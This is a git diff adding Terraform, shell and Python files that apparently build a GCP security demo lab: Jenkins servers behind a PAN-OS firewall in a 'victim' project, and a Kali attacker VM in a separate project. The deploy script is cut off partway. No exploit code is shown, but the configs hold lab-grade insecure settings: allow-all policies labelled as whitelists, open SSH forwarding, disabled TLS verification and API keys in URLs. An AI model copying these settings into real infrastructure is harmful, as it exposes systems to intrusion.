"google_compute_firewall" "attacker" { + name = "attacker-firewall" + project = "${google_project.attacker_project.id}" + network = "${google_compute_network.attacker_network.name}" + allow { + protocol = "tcp" + ports = ["22", "443", "5000"] + } +} diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf new file mode 100644 index 00000000..793bc6c5 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf @@ -0,0 +1,16 @@ +variable "Billing_Account" {} +variable "Victim_Project_Name" {} +variable "Attacker_Project_Name" {} +variable "GCP_Region" {} +variable "GCP_Zone" {} +variable "Management_Subnet_CIDR" {} +variable "Untrust_Subnet_CIDR" {} +variable "Trust_Subnet_CIDR" {} +variable "Attacker_Subnet_CIDR" {} +variable "FW_Mgmt_IP" {} +variable "FW_Untrust_IP" {} +variable "FW_Trust_IP" {} +variable "WebLB_IP" {} +variable "Webserver_IP1" {} +variable "Webserver_IP2" {} +variable "Attacker_IP" {} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh new file mode 100644 index 00000000..032feb65 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh @@ -0,0 +1,14 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " attacker:" >> docker-compose.yml +echo " image: pglynn/kali:latest" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"443:443\"" >> docker-compose.yml +echo " - \"5000:5000\"" >> docker-compose.yml +docker-compose up -d \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh new file mode 100644 index 00000000..55324851 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh @@ -0,0 +1,17 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " jenkins:" >> docker-compose.yml +echo " image: pglynn/jenkins:version1.0" >> docker-compose.yml +echo " environment:" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"50000:50000\"" >> docker-compose.yml +echo " - \"8080:8080\"" >> docker-compose.yml +docker-compose up -d \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf new file mode 100644 index 00000000..2897a657 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf @@ -0,0 +1,147 @@ +resource "google_compute_instance_group" "firewalls" { + name = "firewalls-instance-group" + description = "An instance group for the single FW instance" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + + instances = [ + "${google_compute_instance.firewall.self_link}", + ] + named_port { + name = "http-8080" + port = "8080" + } +} +resource "google_compute_target_pool" "firewalls" { + name = "armor-pool-firewalls" + project = 
"${google_project.victim_project.id}" + + instances = [ + "${google_compute_instance.firewall.self_link}", + ] + + health_checks = [ + "${google_compute_http_health_check.health.name}", + ] +} +resource "google_compute_backend_service" "firewalls" { + name = "armor-backend-firewalls" + description = "With FW" + project = "${google_project.victim_project.id}" + port_name = "http-8080" + protocol = "HTTP" + timeout_sec = 10 + enable_cdn = false + + backend { + group = "${google_compute_instance_group.firewalls.self_link}" + } + + security_policy = "${google_compute_security_policy.security-policy-firewalls.self_link}" + + health_checks = ["${google_compute_http_health_check.health.self_link}"] +} +resource "google_compute_security_policy" "security-policy-firewalls" { + name = "armor-security-policy-firewalls" + description = "example security policy" + project = "${google_project.victim_project.id}" + + # Reject all traffic that hasn't been whitelisted. + rule { + action = "deny(403)" + priority = "2147483647" + + match { + versioned_expr = "SRC_IPS_V1" + + config { + src_ip_ranges = ["*"] + } + } + + description = "Default rule, higher priority overrides it" + } + # Whitelist traffic from certain ip address + rule { + action = "allow" + priority = "1000" + + match { + versioned_expr = "SRC_IPS_V1" + + config { + src_ip_ranges = ["0.0.0.0/0"] + } + } + } +} +resource "google_compute_global_forwarding_rule" "firewalls" { + name = "armor-rule-firewalls" + project = "${google_project.victim_project.id}" + target = "${google_compute_target_http_proxy.firewalls.self_link}" + port_range = "80" +} +resource "google_compute_target_http_proxy" "firewalls" { + name = "armor-proxy-firewalls" + project = "${google_project.victim_project.id}" + url_map = "${google_compute_url_map.firewalls.self_link}" +} +resource "google_compute_url_map" "firewalls" { + name = "armor-url-map-firewalls" + project = "${google_project.victim_project.id}" + default_service = "${google_compute_backend_service.firewalls.self_link}" + + host_rule { + hosts = ["with-firewalls.com"] + path_matcher = "allpaths" + } + path_matcher { + name = "allpaths" + default_service = "${google_compute_backend_service.firewalls.self_link}" + + path_rule { + paths = ["/*"] + service = "${google_compute_backend_service.firewalls.self_link}" + } + } +} +resource "google_compute_health_check" "tcp-8080" { + name = "tcp-8080" + project = "${google_project.victim_project.id}" + check_interval_sec = 1 + timeout_sec = 1 + + tcp_health_check { + port = "8080" + } +} +resource "google_compute_instance_group" "ilb-webservers" { + name = "ilb-webserver-instance-group" + description = "An instance group for the webserver" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + + instances = [ + "${google_compute_instance.jenkins2.self_link}", + ] +} +resource "google_compute_region_backend_service" "ilb-webserver" { + name = "ilb-webserver" + project = "${google_project.victim_project.id}" + region = "${var.GCP_Region}" + health_checks = ["${google_compute_health_check.tcp-8080.self_link}"] + + backend { + group = "${google_compute_instance_group.ilb-webservers.self_link}" + } +} +resource "google_compute_forwarding_rule" "ilb-webserver-forwarding-rule" { + name = "ilb-webserver-forwarding-rule" + project = "${google_project.victim_project.id}" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.WebLB_IP}" + ports = ["8080"] + network = "${google_compute_network.trust_network.self_link}" + subnetwork = 
"${google_compute_subnetwork.trust_subnet.self_link}" + backend_service = "${google_compute_region_backend_service.ilb-webserver.self_link}" +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf new file mode 100644 index 00000000..6f4d872a --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf @@ -0,0 +1,115 @@ +resource "google_compute_instance_group" "webservers" { + name = "webserver-instance-group" + description = "An instance group for the webserver" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + + instances = [ + "${google_compute_instance.jenkins1.self_link}", + ] + named_port { + name = "http-8080" + port = "8080" + } +} +resource "google_compute_target_pool" "webservers" { + name = "armor-pool-webservers" + project = "${google_project.victim_project.id}" + + instances = [ + "${google_compute_instance.jenkins1.self_link}", + ] + + health_checks = [ + "${google_compute_http_health_check.health.name}", + ] +} +resource "google_compute_http_health_check" "health" { + name = "armor-healthcheck" + project = "${google_project.victim_project.id}" + port = 8080 + request_path = "/" + check_interval_sec = 1 + timeout_sec = 1 +} +resource "google_compute_backend_service" "webservers" { + name = "armor-backend-webservers" + description = "Our company website" + project = "${google_project.victim_project.id}" + port_name = "http-8080" + protocol = "HTTP" + timeout_sec = 10 + enable_cdn = false + + backend { + group = "${google_compute_instance_group.webservers.self_link}" + } + + security_policy = "${google_compute_security_policy.security-policy-webservers.self_link}" + + health_checks = ["${google_compute_http_health_check.health.self_link}"] +} +resource "google_compute_security_policy" "security-policy-webservers" { + name = "armor-security-policy-webservers" + description = "example security policy" + project = "${google_project.victim_project.id}" + + # Reject all traffic that hasn't been whitelisted. 
+ rule { + action = "deny(403)" + priority = "2147483647" + + match { + versioned_expr = "SRC_IPS_V1" + + config { + src_ip_ranges = ["*"] + } + } + + description = "Default rule, higher priority overrides it" + } + # Whitelist traffic from certain ip address + rule { + action = "allow" + priority = "1000" + + match { + versioned_expr = "SRC_IPS_V1" + + config { + src_ip_ranges = ["0.0.0.0/0"] + } + } + } +} +resource "google_compute_global_forwarding_rule" "webservers" { + name = "armor-rule-webservers" + project = "${google_project.victim_project.id}" + target = "${google_compute_target_http_proxy.webservers.self_link}" + port_range = "80" +} +resource "google_compute_target_http_proxy" "webservers" { + name = "armor-proxy-webservers" + project = "${google_project.victim_project.id}" + url_map = "${google_compute_url_map.webservers.self_link}" +} +resource "google_compute_url_map" "webservers" { + name = "armor-url-map-webservers" + project = "${google_project.victim_project.id}" + default_service = "${google_compute_backend_service.webservers.self_link}" + + host_rule { + hosts = ["sans-firewalls.com"] + path_matcher = "allpaths" + } + path_matcher { + name = "allpaths" + default_service = "${google_compute_backend_service.webservers.self_link}" + + path_rule { + paths = ["/*"] + service = "${google_compute_backend_service.webservers.self_link}" + } + } +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/main.tf b/gcp/Jenkins_proj-master/WebInDeploy/main.tf new file mode 100644 index 00000000..2039e938 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/main.tf @@ -0,0 +1,5 @@ +provider "google" { + region = "${var.GCP_Region}" +} + +provider "random" {} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/output.tf b/gcp/Jenkins_proj-master/WebInDeploy/output.tf new file mode 100644 index 00000000..b96cf54d --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/output.tf @@ -0,0 +1,15 @@ +output "FW_Mgmt_IP" { + value = "${google_compute_instance.firewall.network_interface.1.access_config.0.nat_ip}" +} + +output "ALB-DNS" { + value = "${google_compute_global_forwarding_rule.firewalls.ip_address}" +} + +output "NATIVE-DNS" { + value = "${google_compute_global_forwarding_rule.webservers.ip_address}" +} + +output "ATTACKER_IP" { + value = "${google_compute_instance.attacker.network_interface.0.access_config.0.nat_ip}" +} diff --git a/gcp/Jenkins_proj-master/WebInDeploy/project.tf b/gcp/Jenkins_proj-master/WebInDeploy/project.tf new file mode 100644 index 00000000..10a1036d --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/project.tf @@ -0,0 +1,25 @@ +resource "random_id" "project_number" { + byte_length = 2 +} +resource "google_project" "victim_project" { + name = "${var.Victim_Project_Name}-${random_id.project_number.hex}" + project_id = "${var.Victim_Project_Name}-${random_id.project_number.hex}" + billing_account = "${var.Billing_Account}" + auto_create_network = false +} +resource "google_project_service" "victim_project" { + project = "${google_project.victim_project.project_id}", + service = "storage-api.googleapis.com" + disable_dependent_services = true +} +resource "google_project" "attacker_project" { + name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}" + project_id = "${var.Attacker_Project_Name}-${random_id.project_number.hex}" + billing_account = "${var.Billing_Account}" + auto_create_network = false +} +resource "google_project_service" "attacker_project" { + project = 
"${google_project.attacker_project.project_id}", + service = "storage-api.googleapis.com" + disable_dependent_services = true +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh new file mode 100644 index 00000000..032feb65 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh @@ -0,0 +1,14 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " attacker:" >> docker-compose.yml +echo " image: pglynn/kali:latest" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"443:443\"" >> docker-compose.yml +echo " - \"5000:5000\"" >> docker-compose.yml +docker-compose up -d \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh new file mode 100644 index 00000000..bb37c3e5 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh @@ -0,0 +1,17 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " jenkins:" >> docker-compose.yml +echo " image: pglynn/jenkins:latest" >> docker-compose.yml +echo " environment:" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"50000:50000\"" >> docker-compose.yml +echo " - \"8080:8080\"" >> docker-compose.yml +docker-compose up -d diff --git a/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars new file mode 100644 index 00000000..20f487e7 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars @@ -0,0 +1,31 @@ +Billing_Account = "" + +Attacker_Project_Name = "attacker" + +Victim_Project_Name = "jenkins" + +GCP_Region = "us-central1" + +GCP_Zone = "us-central1-a" + +Management_Subnet_CIDR = "10.0.0.0/24" + +Untrust_Subnet_CIDR = "10.0.1.0/24" + +Trust_Subnet_CIDR = "10.0.2.0/24" + +Attacker_Subnet_CIDR = "10.1.1.0/24" + +FW_Mgmt_IP = "10.0.0.10" + +FW_Untrust_IP = "10.0.1.10" + +FW_Trust_IP = "10.0.2.10" + +WebLB_IP = "10.0.2.30" + +Webserver_IP1 = "10.0.2.50" + +Webserver_IP2 = "10.0.2.60" + +Attacker_IP = "10.1.1.50" \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf new file mode 100644 index 00000000..811e40dd --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf @@ -0,0 +1,48 @@ +resource "google_compute_network" "management_network" { + project = "${google_project.victim_project.id}" + name = "management" + auto_create_subnetworks = false +} +resource "google_compute_network" "untrust_network" { + project = "${google_project.victim_project.id}" + name = "untrust" + auto_create_subnetworks = false +} +resource "google_compute_network" "trust_network" { + project = "${google_project.victim_project.id}" + name = "trust" + auto_create_subnetworks = false +} +resource 
"google_compute_network" "attacker_network" { + project = "${google_project.attacker_project.id}" + name = "attacker" + auto_create_subnetworks = false +} +resource "google_compute_subnetwork" "management_subnet" { + name = "management" + project = "${google_project.victim_project.id}" + region = "${var.GCP_Region}" + ip_cidr_range = "${var.Management_Subnet_CIDR}" + network = "${google_compute_network.management_network.self_link}" +} +resource "google_compute_subnetwork" "untrust_subnet" { + name = "untrust" + project = "${google_project.victim_project.id}" + region = "${var.GCP_Region}" + ip_cidr_range = "${var.Untrust_Subnet_CIDR}" + network = "${google_compute_network.untrust_network.self_link}" +} +resource "google_compute_subnetwork" "trust_subnet" { + name = "trust" + project = "${google_project.victim_project.id}" + region = "${var.GCP_Region}" + ip_cidr_range = "${var.Trust_Subnet_CIDR}" + network = "${google_compute_network.trust_network.self_link}" +} +resource "google_compute_subnetwork" "attacker_subnet" { + name = "attacker" + project = "${google_project.attacker_project.id}" + region = "${var.GCP_Region}" + ip_cidr_range = "${var.Attacker_Subnet_CIDR}" + network = "${google_compute_network.attacker_network.self_link}" +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf new file mode 100644 index 00000000..bb9d328e --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf @@ -0,0 +1,80 @@ +resource "google_compute_instance" "jenkins1" { + name = "jenkins1" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + machine_type = "n1-standard-1" + allow_stopping_for_update = true + timeouts = { + create = "15m" + delete = "60m" + } + depends_on = [ + "google_storage_bucket_object.config_file_webserver", + "google_project_service.victim_project" + ] + metadata { + startup-script-url = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh" + serial-port-enable = true + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + "https://www.googleapis.com/auth/compute.readonly", + ] + } + + boot_disk { + initialize_params { + image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}" + network_ip = "${var.Webserver_IP1}" + access_config = {} + } + depends_on = ["google_storage_bucket_object.config_file_webserver"] +} +resource "google_compute_instance" "jenkins2" { + name = "jenkins2" + project = "${google_project.victim_project.id}" + zone = "${var.GCP_Zone}" + machine_type = "n1-standard-1" + allow_stopping_for_update = true + depends_on = [ + "google_storage_bucket_object.config_file_webserver", + "google_project_service.victim_project" + ] + metadata { + startup-script-url = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh" + serial-port-enable = true + } + + service_account { + scopes = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + "https://www.googleapis.com/auth/compute.readonly", + ] + } + + boot_disk { + initialize_params { + 
image = "ubuntu-os-cloud/ubuntu-1604-lts" + } + } + + network_interface { + subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}" + network_ip = "${var.Webserver_IP2}" + access_config = {} + } + depends_on = ["google_storage_bucket_object.config_file_webserver"] +} diff --git a/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf new file mode 100644 index 00000000..d9bdc901 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf @@ -0,0 +1,233 @@ +provider "panos" { + hostname = "${var.FW_Mgmt_IP}" + username = "${var.Admin_Username}" + password = "${var.Admin_Password}" +} + +resource "panos_management_profile" "imp_allow_ping" { + name = "Allow ping" + ping = true +} + +resource "panos_ethernet_interface" "eth1_1" { + name = "ethernet1/1" + vsys = "vsys1" + mode = "layer3" + comment = "External interface" + enable_dhcp = true + create_dhcp_default_route = true + management_profile = "${panos_management_profile.imp_allow_ping.name}" +} + +resource "panos_ethernet_interface" "eth1_2" { + name = "ethernet1/2" + vsys = "vsys1" + mode = "layer3" + comment = "Web interface" + enable_dhcp = true +} + +resource "panos_zone" "zone_untrust" { + name = "UNTRUST" + mode = "layer3" + interfaces = ["${panos_ethernet_interface.eth1_1.name}"] +} + +resource "panos_zone" "zone_trust" { + name = "TRUST" + mode = "layer3" + interfaces = ["${panos_ethernet_interface.eth1_2.name}"] +} + +resource "panos_service_object" "so_22" { + name = "service-tcp-22" + protocol = "tcp" + destination_port = "22" +} + +resource "panos_service_object" "so_221" { + name = "service-tcp-221" + protocol = "tcp" + destination_port = "221" +} + +resource "panos_service_object" "so_222" { + name = "service-tcp-222" + protocol = "tcp" + destination_port = "222" +} + +resource "panos_address_object" "intLB" { + name = "GCP-Int-LB" + value = "${var.WebLB_IP}" + description = "GCP Int LB Address" +} + +resource "panos_security_policies" "security_policies" { + rule { + name = "SSH inbound" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["ssh", "ping"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "SSH 221-222 inbound" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["ssh", "ping"] + services = ["${panos_service_object.so_221.name}", "${panos_service_object.so_222.name}"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Allow all ping" + source_zones = ["any"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["any"] + destination_addresses = ["any"] + applications = ["ping"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Permit Health Checks" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["google-health-check"] + services = ["service-http"] + categories = ["any"] + action = "allow" + } + + rule { + name 
= "Web browsing" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"] + destination_addresses = ["any"] + applications = ["web-browsing", "jenkins"] + services = ["service-http"] + categories = ["any"] + group = "Inbound" + action = "allow" + } + + rule { + name = "Allow all outbound" + source_zones = ["${panos_zone.zone_trust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_untrust.name}"] + destination_addresses = ["any"] + applications = ["any"] + services = ["application-default"] + categories = ["any"] + group = "Outbound" + action = "allow" + } +} + +resource "panos_nat_rule_group" "nat" { + rule { + name = "Web1 SSH" + original_packet { + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + service = "${panos_service_object.so_221.name}" + } + translated_packet { + source { + dynamic_ip_and_port { + interface_address { + interface = "${panos_ethernet_interface.eth1_2.name}" + } + } + } + destination { + static { + address = "${var.Webserver_IP1}" + port = 22 + } + } + } + } + rule { + name = "Web2 SSH" + original_packet { + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + service = "${panos_service_object.so_222.name}" + } + translated_packet { + source { + dynamic_ip_and_port { + interface_address { + interface = "${panos_ethernet_interface.eth1_2.name}" + } + } + } + destination { + static { + address = "${var.Webserver_IP2}" + port = 22 + } + } + } + } + rule { + name = "Webserver NAT" + original_packet { + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + service = "service-http" + } + translated_packet { + source { + dynamic_ip_and_port { + interface_address { + interface = "${panos_ethernet_interface.eth1_2.name}" + } + } + } + destination { + static { + address = "GCP-Int-LB" + } + } + } + } +} +resource "panos_virtual_router" "vr1" { + name = "default" + interfaces = ["${panos_ethernet_interface.eth1_1.name}", "${panos_ethernet_interface.eth1_2.name}"] +} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf new file mode 100644 index 00000000..879b9d9b --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf @@ -0,0 +1,7 @@ +variable "FW_Mgmt_IP" {} +variable "FW_Untrust_IP" {} +variable "Webserver_IP1" {} +variable "Webserver_IP2" {} +variable "WebLB_IP" {} +variable "Admin_Username" {} +variable "Admin_Password" {} \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars new file mode 100644 index 00000000..ae5cfd65 --- /dev/null +++ b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars @@ -0,0 +1,11 @@ +Admin_Username = "" + +Admin_Password = "" + +FW_Untrust_IP = "10.0.1.10" + +WebLB_IP = "10.0.2.30" + +Webserver_IP1 = "10.0.2.50" + +Webserver_IP2 = "10.0.2.60" \ No newline at end of file diff --git a/gcp/Jenkins_proj-master/deploy.py 
b/gcp/Jenkins_proj-master/deploy.py new file mode 100644 index 00000000..35b66a1e --- /dev/null +++ b/gcp/Jenkins_proj-master/deploy.py @@ -0,0 +1,653 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py -u -p -r -a + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict +import requests +import urllib3 +from google.cloud import storage + + +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) + + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. 
Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + +def walkdict(dict, match): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + for key, v in dict.items(): + if key == match: + jobid = v + return jobid + elif isinstance(v, OrderedDict): + found = walkdict(v, match) + if found is not None: + return found + + + +def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete ") + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + # Install latest content update + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. 
